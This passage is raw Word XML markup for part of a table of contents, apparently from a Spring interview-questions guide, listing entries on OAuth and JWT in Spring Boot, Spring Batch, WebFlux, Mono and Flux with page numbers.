              <w:instrText xml:space="preserve"> PAGEREF _Toc197867687 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>633</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="610BE1A5" w14:textId="4EF93CC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7867688 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>633</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FDC519B" w14:textId="2966A39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7867689 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>633</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="623378E7" w14:textId="15DC01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7867690 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>633</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6BB22EB3" w14:textId="4D8AAB8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7867691 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>634</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DB681BD" w14:textId="653F59E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7867692 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>634</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D9BFB1D" w14:textId="5E11FEF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7867693 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>635</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73FD5E00" w14:textId="24F1EFF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7867694 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>635</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A0C175E" w14:textId="55A9095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7867695 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>635</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CE9443F" w14:textId="31B6E5F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7867696 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>635</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3BEBE939" w14:textId="222D7E3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7867697 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>635</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="645EFC5B" w14:textId="2103A22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7867698 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>635</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B04284B" w14:textId="054C22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6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7867699 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>635</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="598A9B0A" w14:textId="462FE99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7867700 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>636</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="356AA7A6" w14:textId="0993A65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7867701 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>636</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57AE5D0D" w14:textId="130A501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7867702 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>636</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57349C14" w14:textId="150A53E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OAuth in detail in Spring Boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867703 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>636</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18549BBC" w14:textId="312A558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WT in detail in Spring Boot?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867704 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>639</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00E7476E" w14:textId="2FAE179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7867705 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>643</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43ABE90E" w14:textId="627D2701"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706" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Spring Batch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867706 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>644</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35188A5D" w14:textId="336B729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7867707 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>644</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0980F3A5" w14:textId="58D2E3C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7867708 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>645</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="330FBCF6" w14:textId="06B94DB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7867709 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>646</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DD0EFCC" w14:textId="567E2833"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710" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Spring Reactive</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867710 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>649</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="538C5B6C" w14:textId="64682CB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7867711 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>649</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A9C10E1" w14:textId="67A96BE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7867712 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>649</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60406EFD" w14:textId="67DEFE4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 WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867713 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>650</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22EEC54A" w14:textId="1F2D82A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pring WebFlux and Spring MVC?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867714 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>651</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D137882" w14:textId="3975FF7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advantages of Spring WebFlux over traditional Spring MVC?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867715 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>651</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F02D7CA" w14:textId="2D1AFC3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Mono in Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867716 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>652</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B1D1B94" w14:textId="08ECC4E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Mono works?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867717 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>653</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46B7C346" w14:textId="7D47EE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type of data does Mono represent?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867718 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>654</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12CB2B59" w14:textId="6764F5F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Flux in Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867719 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>654</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="174AC3C9" w14:textId="7DEFDBC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Flux works?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867720 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>655</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A45B051" w14:textId="544BD32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Flux differ from Mono?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
